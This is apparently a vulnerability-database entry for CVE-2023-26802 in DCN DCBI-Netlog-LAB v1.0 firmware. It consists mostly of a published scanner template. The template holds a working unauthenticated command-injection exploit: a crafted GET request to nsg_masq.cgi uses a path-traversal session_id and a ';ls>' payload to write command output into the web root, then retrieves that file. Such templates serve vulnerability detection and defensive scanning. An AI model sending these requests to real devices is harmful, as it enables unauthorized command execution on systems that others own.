漏洞描述
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
CVE-2023-26802: DCBI-Netlog-LAB v1.0 - Command Injection
PoC代码[已公开]
id: CVE-2023-26802
info:
name: DCBI-Netlog-LAB v1.0 - Command Injection
author: pussycat0x
severity: critical
description: |
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
reference:
- https://web.archive.org/web/20230605051153/https://github.com/winmt/my-vuls/tree/main/DCN%20DCBI-Netlog-LAB
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-26802
cwe-id: CWE-22
epss-score: 0.84594
epss-percentile: 0.99284
cpe: cpe:2.3:o:dcnglobal:dcbi-netlog-lab_firmware:1.0:*:*:*:*:*:*:*
metadata:
vendor: dcnglobal
product: dcbi-netlog-lab_firmware
tags: cve,cve2023,rce,unauth,netlog,vkev,vuln
variables:
file_name: "{{rand_text_alpha(4)}}.html"
http:
- raw:
- |
GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}}; HTTP/1.1
Host: {{Hostname}}
DNT: 1
X-Forwarded-For: 8.8.8.8
- |
GET /{{file_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
DNT: 1
X-Forwarded-For: 8.8.8.8
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "nsg_bridge.cgi"
- "nsg_dhcpactiveip.cgi"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022039f538e665597e562e7d217502962bd8a50f7f7e7bb556074ebe350835acc61d022046c2cb648399a3e26fbb7f9010e9519dd6d13c7f6683846da4050cae6c70da94:922c64590222798bb761d5b6d8e72950